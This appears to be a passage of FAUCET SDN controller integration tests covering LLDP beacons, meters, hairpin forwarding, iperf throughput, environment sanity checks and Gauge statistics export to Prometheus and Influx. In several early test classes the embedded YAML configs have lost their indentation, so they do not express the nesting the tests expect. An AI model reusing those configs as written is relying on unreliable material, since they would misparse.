    def wireshark_payload_format(payload_str):
        """Format a hex string the way tcpdump/wireshark dump payloads.

        Emits space-separated groups of 4 hex chars, prefixed with an
        '0xNNNN: ' byte-offset marker at the start of each 16-byte row.
        Any trailing chars beyond a multiple of 4 are dropped.
        """
        formatted_payload_str = ''
        groupsize = 4
        for payload_offset in range(len(payload_str) // groupsize):
            # 4 hex chars == 2 payload bytes, so the byte offset steps by 2.
            char_count = payload_offset * 2
            if char_count % 0x10 == 0:
                formatted_payload_str += '0x%4.4x: ' % char_count
            payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
            formatted_payload_str += ' ' + payload_fragment
        return formatted_payload_str

    def test_untagged(self):
        first_host = self.hosts_name_ordered()[0]
        tcpdump_filter = 'ether proto 0x88cc'
        timeout = 5 * 3
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, [
                lambda: first_host.cmd('sleep %u' % timeout)],
            timeout=timeout, vflags='-vv', packets=1)
        # Expected DP ID TLV payload: FAUCET MAC OUI + attr byte + hex dpid.
        oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
        faucet_lldp_dp_id_attr = '%2.2x' % 1
        expected_lldp_dp_id = ''.join((
            oui_prefix,
            faucet_lldp_dp_id_attr,
            binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
        for lldp_required in (
                r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
                r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
                r'System Name TLV \(5\), length 6: faucet',
                r'Port Description TLV \(4\), length 10: first_port',
                self.wireshark_payload_format(expected_lldp_dp_id)):
            self.assertTrue(
                re.search(lldp_required, tcpdump_txt),
                msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetLLDPIntervalTest(FaucetUntaggedTest):
    """Verify consecutive LLDP beacons are at least send_interval apart."""

    NUM_FAUCET_CONTROLLERS = 1

    CONFIG = """
lldp_beacon:
send_interval: 10
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""

    def test_untagged(self):
        first_host = self.hosts_name_ordered()[0]
        tcpdump_filter = 'ether proto 0x88cc'
        interval = 10
        timeout = interval * 3
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, [
                lambda: first_host.cmd('sleep %u' % timeout)],
            # output epoch secs
            timeout=timeout, vflags='-tt', packets=2)
        timestamps = re.findall(r'(\d+)\.\d+ [0-9a-f:]+ \> [0-9a-f:]+', tcpdump_txt)
        timestamps = [int(timestamp) for timestamp in timestamps]
        # Fail with the capture output, rather than a bare IndexError,
        # if fewer than two beacons were seen.
        self.assertGreaterEqual(len(timestamps), 2, msg=tcpdump_txt)
        # assertGreaterEqual reports the actual gap on failure.
        self.assertGreaterEqual(
            timestamps[1] - timestamps[0], interval, msg=tcpdump_txt)
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
    """Verify LLDP beacons fall back to default system name and port
    description when those are not configured on the port."""

    # No system_name/port_descr configured: defaults are expected.
    CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""

    def test_untagged(self):
        first_host = self.hosts_name_ordered()[0]
        tcpdump_filter = 'ether proto 0x88cc'
        timeout = 5 * 3
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, [
                lambda: first_host.cmd('sleep %u' % timeout)],
            timeout=timeout, vflags='-vv', packets=1)
        # Defaults: DP name ("faucet-1") and port name ("b<port>").
        for lldp_required in (
                r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
                r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
                r'System Name TLV \(5\), length 8: faucet-1',
                r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
            self.assertTrue(
                re.search(lldp_required, tcpdump_txt),
                msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
    """Verify a meter + metered-ACL config parses, with Gauge configured
    to collect meter stats."""

    REQUIRES_METERS = True
    # NOTE(review): userspace OVS appears to be required here, presumably
    # for meter support — confirm against the harness.
    OVS_TYPE = 'user'

    # One DROP-band KBPS meter and an ACL that applies it.
    CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""

    def get_gauge_watcher_config(self):
        """Return Gauge watchers: port stats/state plus meter stats to both
        a text file and prometheus."""
        return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)

    GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""

    # Port number is allocated by the test harness at runtime.
    config_ports = {'gauge_prom_port': None}

    def _get_gauge_meter_config(self, faucet_config_file,
                                monitor_stats_file,
                                monitor_state_file,
                                monitor_meter_stats_file):
        """Build Gauge Meter config."""
        return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
       monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
       self.GAUGE_CONFIG_DBS)

    def _init_gauge_config(self):
        """Write the Gauge config file, substituting allocated ports."""
        gauge_config = self._get_gauge_meter_config(
            self.faucet_config_path,
            self.monitor_stats_file,
            self.monitor_state_file,
            self.monitor_meter_stats_file)
        if self.config_ports:
            gauge_config = gauge_config % self.config_ports
        self._write_yaml_conf(self.gauge_config_path, yaml_load(gauge_config))

    def test_untagged(self):
        """All hosts on the same untagged VLAN should have connectivity."""
        # TODO: userspace DP port status not reliable.
        self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
    """Apply the lossy meter ACL on a port and verify the meter band
    counters actually increase under load."""

    CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""

    def test_untagged(self):
        super().test_untagged()
        first_host, second_host = self.hosts_name_ordered()[:2]
        # Flood pings through the metered port to exercise the DROP band.
        error('metered ping flood: %s' % first_host.cmd(
            'ping -c 1000 -f %s' % second_host.IP()))
        # Require meter band bytes to match.
        self.wait_until_matching_lines_from_file(
            r'.+faucet-1-1-byte-band-count.+[1-9].+',
            self.monitor_meter_stats_file)
        meter_labels = {
            'dp_id': self.dpid,
            'dp_name': self.DP_NAME,
            'meter_id': 1
        }
        # The prometheus meter stats watcher must also have seen band bytes.
        byte_band_count = self.scrape_prometheus_var(
            'of_meter_byte_band_count', labels=meter_labels, controller=self.gauge_controller.name)
        self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
    """Verify a meter can be added by config reload and removed again when
    no ACL references it."""

    NUM_FAUCET_CONTROLLERS = 1

    def test_untagged(self):
        super().test_untagged()
        conf = self._get_faucet_conf()
        # Add a second meter and an ACL that references it.
        conf['meters']['lossymeter2'] = {
            'meter_id': 2,
            'entry': {
                'flags': ['PKTPS'],
                'bands': [{'rate': '1000', 'type': 'DROP'}]
            },
        }
        conf['acls']['lossyacl2'] = [{
            'rule': {
                'actions': {
                    'allow': 1,
                    'meter': 'lossymeter2'
                }
            }
        }]
        port_conf = conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_2']]
        port_conf['acls_in'] = ['lossyacl2']
        self.reload_conf(
            conf, self.faucet_config_path,
            restart=True, cold_start=True, change_expected=True, hup=True)
        # Meter 2 should now exist on the DP.
        self.wait_until_matching_lines_from_file(
            r'.+\'meter_id\'\: 2+',
            self.get_matching_meters_on_dpid(self.dpid))
        # Remove the ACL reference: the meter should be deleted.
        port_conf['acls_in'] = []
        self.reload_conf(
            conf, self.faucet_config_path,
            restart=True, cold_start=True, change_expected=True)
        self.wait_until_no_matching_lines_from_file(
            r'.+\'meter_id\'\: 2+',
            self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
    """Verify an existing meter's flags can be modified via config reload."""

    def test_untagged(self):
        super().test_untagged()
        conf = self._get_faucet_conf()
        # Attach the lossy ACL so the meter is actually installed.
        conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_1']]['acls_in'] = ['lossyacl']
        self.reload_conf(
            conf, self.faucet_config_path,
            restart=True, cold_start=True, change_expected=True, hup=True)
        self.wait_until_matching_lines_from_file(
            r'.+KBPS+',
            self.get_matching_meters_on_dpid(self.dpid))
        # Change the meter's rate units; a warm reload should update it.
        conf['meters']['lossymeter']['entry']['flags'] = ['PKTPS']
        self.reload_conf(
            conf, self.faucet_config_path,
            restart=True, cold_start=False, change_expected=True, hup=True)
        self.wait_until_matching_lines_from_file(
            r'.+PKTPS+',
            self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
    """Verify hairpin (OUTPUT:IN_PORT) forwarding between two macvlans on
    the same physical port."""

    NETNS = True

    CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""

    def test_untagged(self):
        # Create macvlan interfaces, with one in a separate namespace,
        # to force traffic between them to be hairpinned via FAUCET.
        first_host, second_host = self.hosts_name_ordered()[:2]
        macvlan1_intf = 'macvlan1'
        macvlan1_ipv4 = '10.0.0.100'
        macvlan2_intf = 'macvlan2'
        macvlan2_ipv4 = '10.0.0.101'
        self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
        self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
        macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
        # Move macvlan2 into its own namespace and configure it there.
        netns = self.hostns(first_host)
        setup_cmds = []
        setup_cmds.extend(
            ['ip link set %s netns %s' % (macvlan2_intf, netns)])
        for exec_cmd in (
                ('ip address add %s/24 brd + dev %s' % (
                    macvlan2_ipv4, macvlan2_intf),
                 'ip link set %s up' % macvlan2_intf)):
            setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
        self.quiet_commands(first_host, setup_cmds)
        # Ping macvlan1 -> macvlan2: must hairpin through the switch.
        self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_intf)
        self.one_ipv4_ping(first_host, second_host.IP())
        # Verify OUTPUT:IN_PORT flood rules are exercised.
        self.wait_nonzero_packet_count_flow(
            {'in_port': self.port_map['port_1'],
             'dl_dst': 'ff:ff:ff:ff:ff:ff'},
            table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
        self.wait_nonzero_packet_count_flow(
            {'in_port': self.port_map['port_1'],
             'dl_dst': macvlan2_mac},
            table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
    """Repeat the hairpin test with group_table flooding enabled."""

    CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
    """Verify minimum TCP/IPv4 iperf throughput between the first two
    hosts, across repeated port flaps."""

    def test_untagged(self):
        client, server = self.hosts_name_ordered()[:2]
        client_ip = ipaddress.ip_address(client.IP())
        server_ip = ipaddress.ip_address(server.IP())
        client_pair = (client, self.port_map['port_1'])
        server_pair = (server, self.port_map['port_2'])
        for _ in range(3):
            self.ping_all_when_learned()
            self.verify_iperf_min(
                (client_pair, server_pair),
                MIN_MBPS, client_ip, server_ip,
                sync_counters_func=lambda: self.one_ipv4_ping(client, server_ip))
            self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
    """Verify minimum TCP/IPv6 iperf throughput between the first two
    hosts, across repeated port flaps."""

    def test_untagged(self):
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
        second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
        self.add_host_ipv6_address(first_host, first_host_ip)
        self.add_host_ipv6_address(second_host, second_host_ip)
        for _ in range(3):
            self.ping_all_when_learned()
            self.verify_iperf_min(
                ((first_host, self.port_map['port_1']),
                 (second_host, self.port_map['port_2'])),
                MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
                sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
            self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
    """Sanity test - make sure test environment is correct before running all tests."""

    def test_scapy_fuzz(self):
        """Verify the installed scapy can send fuzzed packets.

        Scapy 2.4.5 has issues with 'fuzz' generation so black-list that
        version with a test: https://github.com/secdev/scapy/issues/3306
        TODO: fix expected in next scapy release, > 2.4.5.
        """
        exception = False
        try:
            scapy.all.send(scapy.all.fuzz(scapy.all.Ether()))  # pylint: disable=no-member
        except Exception as e:  # pylint: disable=broad-except
            error('%s:' % self._test_name(), e)
            exception = True
        self.assertFalse(exception, 'Scapy threw an exception in send(fuzz())')

    def test_ryu_config(self):
        """Verify FAUCET is running with the expected Ryu OF settings."""
        varstr = ', '.join(self.scrape_prometheus(var='ryu_config'))
        self.assertTrue('echo_request_interval"} 10.0' in varstr)
        self.assertTrue('maximum_unreplied_echo_requests"} 5.0' in varstr)

    def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
        """Require dp_port to be up, unconfigured-down, and at line rate.

        Retries up to `retries` times (1s apart) before failing.
        """
        for _ in range(retries):
            port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
            port_name = port_desc['name']
            port_state = port_desc['state']
            port_config = port_desc['config']
            port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
            error('DP %u is %s, at %u mbps\n' % (dp_port, port_name, port_speed_mbps))
            if port_speed_mbps < min_mbps:
                error('port speed %u below minimum %u mbps\n' % (
                    port_speed_mbps, min_mbps))
            elif port_config != 0:
                error('port config %u must be 0 (all clear)' % port_config)
            elif port_state not in (0, 4):
                # 0 == all flags clear, 4 == OFPPS_LIVE.
                error('state %u must be 0 (all flags clear or live)\n' % (
                    port_state))
            else:
                return
            time.sleep(1)
        self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))

    def test_portmap(self):
        """Verify cabling and that exactly the test hosts are learned."""
        prom_desc = self.scrape_prometheus(var='of_dp_desc_stats')
        self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
        error('DP: %s\n' % prom_desc[0])
        error('port_map: %s\n' % self.port_map)
        for i, host in enumerate(self.hosts_name_ordered(), start=1):
            in_port = 'port_%u' % i
            dp_port = self.port_map[in_port]
            if dp_port in self.switch_map:
                error('verifying cabling for %s: host %s -> dp %u\n' % (
                    in_port, self.switch_map[dp_port], dp_port))
            else:
                error('verifying host %s -> dp %s\n' % (
                    in_port, dp_port))
            self.verify_dp_port_healthy(dp_port)
            self.require_host_learned(host, in_port=dp_port)
        learned = self.prom_macs_learned()
        self.assertEqual(
            len(self.hosts_name_ordered()), len(learned),
            msg='test requires exactly %u hosts learned (got %s)' % (
                len(self.hosts_name_ordered()), learned))

    def test_listening(self):
        """Fail if anything is listening on the test interfaces; warn about
        wildcard listeners."""
        msg_template = (
            'Processes listening on test, or all interfaces may interfere with tests. '
            'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
        controller = self._get_controller()
        ss_out = controller.cmd('ss -lnep').splitlines()
        listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
        listening_all = [line for line in ss_out if listening_all_re.match(line)]
        for test_intf in list(self.switch_map.values()):
            int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
            listening_int = [line for line in ss_out if int_re.match(line)]
            self.assertFalse(
                len(listening_int),
                msg=(msg_template % '\n'.join(listening_int)))
        if listening_all:
            print('Warning: %s' % (msg_template % '\n'.join(listening_all)))

    def test_silence(self):
        """Make all test hosts silent and ensure we hear no other packets."""
        for host in self.hosts_name_ordered():
            self.host_drop_all_ips(host)
            host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
        for host in self.hosts_name_ordered():
            tcpdump_filter = ''
            tcpdump_txt = self.tcpdump_helper(
                host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
            # Original code called tcpdump_rx_packets() twice and discarded
            # the first result; a single asserted call suffices.
            self.assertTrue(
                self.tcpdump_rx_packets(tcpdump_txt, 0),
                msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
    """Testing Gauge Prometheus"""

    GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""

    # Port number is allocated by the test harness at runtime.
    config_ports = {'gauge_prom_port': None}

    def get_gauge_watcher_config(self):
        """Return Gauge watchers exporting port and flow stats to prometheus."""
        return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)

    def _start_gauge_check(self):
        """Return an error string if Gauge's prometheus port isn't up."""
        if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
            return 'gauge not listening on prometheus port'
        return None

    def test_untagged(self):
        """Verify Gauge exports increasing port and per-host flow counters."""
        self.wait_dp_status(1, controller=self.gauge_controller.name)
        self.assertIsNotNone(self.scrape_prometheus_var(
            'faucet_pbr_version', any_labels=True, controller=self.gauge_controller.name, retries=3))
        conf = self._get_faucet_conf()
        cookie = conf['dps'][self.DP_NAME]['cookie']
        if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
            self.fail(msg='Gauge Prometheus port counters not increasing')
        # Poll until every host's eth_dst flow counters are nonzero.
        for _ in range(self.DB_TIMEOUT * 3):
            updated_counters = True
            for host in self.hosts_name_ordered():
                host_labels = {
                    'dp_id': self.dpid,
                    'dp_name': self.DP_NAME,
                    'cookie': cookie,
                    'eth_dst': host.MAC(),
                    'inst_count': str(1),
                    'table_id': str(self._ETH_DST_TABLE),
                    'vlan': str(100),
                    # 4196 == VID 100 with the OFPVID_PRESENT (0x1000) bit set.
                    'vlan_vid': str(4196)
                }
                packet_count = self.scrape_prometheus_var(
                    'flow_packet_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
                byte_count = self.scrape_prometheus_var(
                    'flow_byte_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
                if packet_count is None or packet_count == 0:
                    updated_counters = False
                if byte_count is None or byte_count == 0:
                    updated_counters = False
            if updated_counters:
                return
            time.sleep(1)
        self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
    """Basic untagged VLAN test with Influx."""
    GAUGE_CONFIG_DBS = """
    influx:
        type: 'influx'
        influx_db: 'faucet'
        influx_host: '127.0.0.1'
        influx_port: %(gauge_influx_port)d
        influx_user: 'faucet'
        influx_pwd: ''
        influx_retries: 1
""" + """
        influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
    config_ports = {'gauge_influx_port': None}
    # Path of the fake Influx server's log of received points.
    influx_log = None
    server_thread = None
    server = None
    def get_gauge_watcher_config(self):
        """Return Gauge watcher config shipping port/flow stats to Influx."""
        return """
    port_stats:
        dps: ['%s']
        type: 'port_stats'
        interval: 2
        db: 'influx'
    port_state:
        dps: ['%s']
        type: 'port_state'
        interval: 2
        db: 'influx'
    flow_table:
        dps: ['%s']
        type: 'flow_table'
        interval: 2
        db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
    def setup_influx(self):
        """Point the fake Influx server at this test's log file."""
        self.influx_log = os.path.join(self.tmpdir, 'influx.log')
        if self.server:
            self.server.influx_log = self.influx_log
            self.server.timeout = self.DB_TIMEOUT
    def setUp(self):
        # Handler must be set before super().setUp() starts the server.
        self.handler = InfluxPostHandler
        super().setUp()
        self.setup_influx()
    def tearDown(self, ignore_oferrors=False):
        if self.server:
            self.server.shutdown()
            self.server.socket.close()
        super().tearDown(ignore_oferrors=ignore_oferrors)
    def _wait_error_shipping(self, timeout=None):
        """Wait for Gauge to log that it could not ship points to Influx."""
        if timeout is None:
            timeout = self.DB_TIMEOUT * 3 * 2
        self.wait_until_matching_lines_from_gauge_log_files(
            r'.+error shipping.+', timeout=timeout)
    def _verify_influx_log(self, retries=3):
        """Parse the received Influx line-protocol points and sanity-check them."""
        self.assertTrue(os.path.exists(self.influx_log))
        expected_vars = {
            'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
            'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
            'port_state_reason', 'packets_in', 'packets_out'}
        observed_vars = set()
        for _ in range(retries):
            with open(self.influx_log, encoding='utf-8') as influx_log:
                influx_log_lines = influx_log.readlines()
            for point_line in influx_log_lines:
                # Line protocol: <measurement,tags> <field=value> <timestamp>
                point_fields = point_line.strip().split()
                self.assertEqual(3, len(point_fields), msg=point_fields)
                ts_name, value_field, _ = point_fields
                # Parse the field value to validate that it is numeric.
                point_value = float(value_field.split('=')[1])
                del point_value
                ts_name_fields = ts_name.split(',')
                self.assertGreater(len(ts_name_fields), 1)
                observed_vars.add(ts_name_fields[0])
                label_values = {}
                for label_value in ts_name_fields[1:]:
                    label, label_val = label_value.split('=')
                    label_values[label] = label_val
                if ts_name.startswith('flow'):
                    self.assertTrue('inst_count' in label_values, msg=point_line)
                    if 'vlan_vid' in label_values:
                        # Fix: compare against the vlan_vid tag explicitly rather
                        # than the leftover loop variable, which was only correct
                        # when vlan_vid happened to be the last tag in the set.
                        # vlan must equal vlan_vid with the VID-present bit cleared.
                        self.assertEqual(
                            int(label_values['vlan']),
                            int(label_values['vlan_vid']) ^ 0x1000)
            if expected_vars == observed_vars:
                break
            time.sleep(1)
        self.assertEqual(expected_vars, observed_vars)
        self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
    def _wait_influx_log(self):
        """Wait for the fake Influx server to create its log file."""
        for _ in range(self.DB_TIMEOUT * 3):
            if os.path.exists(self.influx_log):
                return
            time.sleep(1)
    def _start_gauge_check(self):
        """Start the fake Influx HTTP server; return error string on failure."""
        if self.server_thread:
            return None
        influx_port = self.config_ports['gauge_influx_port']
        try:
            self.server = QuietHTTPServer(
                (mininet_test_util.LOCALHOST, influx_port),
                self.handler) # pytype: disable=attribute-error
            self.server.timeout = self.DB_TIMEOUT
            self.server_thread = threading.Thread(
                target=self.server.serve_forever)
            self.server_thread.daemon = True
            self.server_thread.start()
            return None
        except socket.error as err:
            return 'cannot start Influx test server: %s' % err
    def test_untagged(self):
        """Generate traffic/port flaps and verify points arrive in Influx."""
        self.ping_all_when_learned()
        self.hup_controller(self.gauge_controller.name)
        self.flap_all_switch_ports()
        self._wait_influx_log()
        self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
        FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
    """Watchers configured to ship to Prometheus and Influx simultaneously."""
    GAUGE_CONFIG_DBS = """
    prometheus:
        type: 'prometheus'
        prometheus_addr: '::1'
        prometheus_port: %(gauge_prom_port)d
    influx:
        type: 'influx'
        influx_db: 'faucet'
        influx_host: '127.0.0.1'
        influx_port: %(gauge_influx_port)d
        influx_user: 'faucet'
        influx_pwd: ''
        influx_retries: 1
""" + """
        influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
    # Both ports allocated dynamically by the test harness.
    config_ports = {
        'gauge_prom_port': None,
        'gauge_influx_port': None}
    def get_gauge_watcher_config(self):
        """Return watcher config shipping each stat type to both DBs."""
        return """
    port_stats:
        dps: ['%s']
        type: 'port_stats'
        interval: 5
        dbs: ['prometheus', 'influx']
    port_state:
        dps: ['%s']
        type: 'port_state'
        interval: 5
        dbs: ['prometheus', 'influx']
    flow_table:
        dps: ['%s']
        type: 'flow_table'
        interval: 5
        dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
    @staticmethod
    def test_tagged():
        # Disable the inherited tagged test; this class only runs untagged.
        return
    def test_untagged(self):
        """Verify both Prometheus and Influx receive stats for the same DP."""
        self.wait_dp_status(1, controller=self.gauge_controller.name)
        self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
        self.ping_all_when_learned()
        self.hup_controller(controller=self.gauge_controller.name)
        self.flap_all_switch_ports()
        self._wait_influx_log()
        self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
    """Influx watcher configured but no Influx server listening."""
    def _start_gauge_check(self):
        # Deliberately do not start the fake Influx server.
        return None
    def test_untagged(self):
        """Switching still works and Gauge logs shipping errors, no exceptions."""
        self.ping_all_when_learned()
        self._wait_error_shipping()
        gauge_exc_log = self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG']
        self.verify_no_exception(gauge_exc_log)
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
    """Influx host routed to an unreachable address; Gauge must cope."""
    GAUGE_CONFIG_DBS = """
    influx:
        type: 'influx'
        influx_db: 'faucet'
        influx_host: '127.0.0.2'
        influx_port: %(gauge_influx_port)d
        influx_user: 'faucet'
        influx_pwd: ''
        influx_timeout: 2
"""
    def _start_gauge_check(self):
        # No fake Influx server: the configured host is intentionally dead.
        return None
    def test_untagged(self):
        """Blackhole the Influx address, verify errors are logged not raised."""
        self.gauge_controller.cmd(
            'route add 127.0.0.2 gw 127.0.0.1 lo')
        self.ping_all_when_learned()
        self._wait_error_shipping()
        gauge_exc_log = self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG']
        self.verify_no_exception(gauge_exc_log)
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
    """Influx server accepts connections but responds too slowly."""
    def setUp(self):
        # The slow handler must be installed before super().setUp() runs.
        self.handler = SlowInfluxPostHandler
        super().setUp()
        self.setup_influx()
    def test_untagged(self):
        """Slow Influx responses produce shipping errors but no exceptions."""
        self.ping_all_when_learned()
        self._wait_influx_log()
        self.assertTrue(os.path.exists(self.influx_log))
        self._wait_error_shipping()
        gauge_exc_log = self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG']
        self.verify_no_exception(gauge_exc_log)
class FaucetNailedForwardingTest(FaucetUntaggedTest):
    """Hosts reach each other purely via static ACL output rules (no learning)."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "0e:00:00:00:02:02"
            actions:
                output:
                    port: %(port_2)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.2"
            actions:
                output:
                    port: %(port_2)d
        - rule:
            actions:
                allow: 0
    2:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            actions:
                allow: 0
    3:
        - rule:
            actions:
                allow: 0
    4:
        - rule:
            actions:
                allow: 0
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 2
            %(port_3)d:
                native_vlan: 100
                acl_in: 3
            %(port_4)d:
                native_vlan: 100
                acl_in: 4
"""
    def test_untagged(self):
        """Bidirectional ping succeeds without requiring host learning."""
        host_a, host_b = self.hosts_name_ordered()[0:2]
        host_a.setMAC('0e:00:00:00:01:01')
        host_b.setMAC('0e:00:00:00:02:02')
        for src, dst in ((host_a, host_b), (host_b, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
    """As FaucetNailedForwardingTest, using ordered (list-form) ACL actions."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "0e:00:00:00:02:02"
            actions:
                output:
                    - port: %(port_2)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.2"
            actions:
                output:
                    - port: %(port_2)d
        - rule:
            actions:
                allow: 0
    2:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
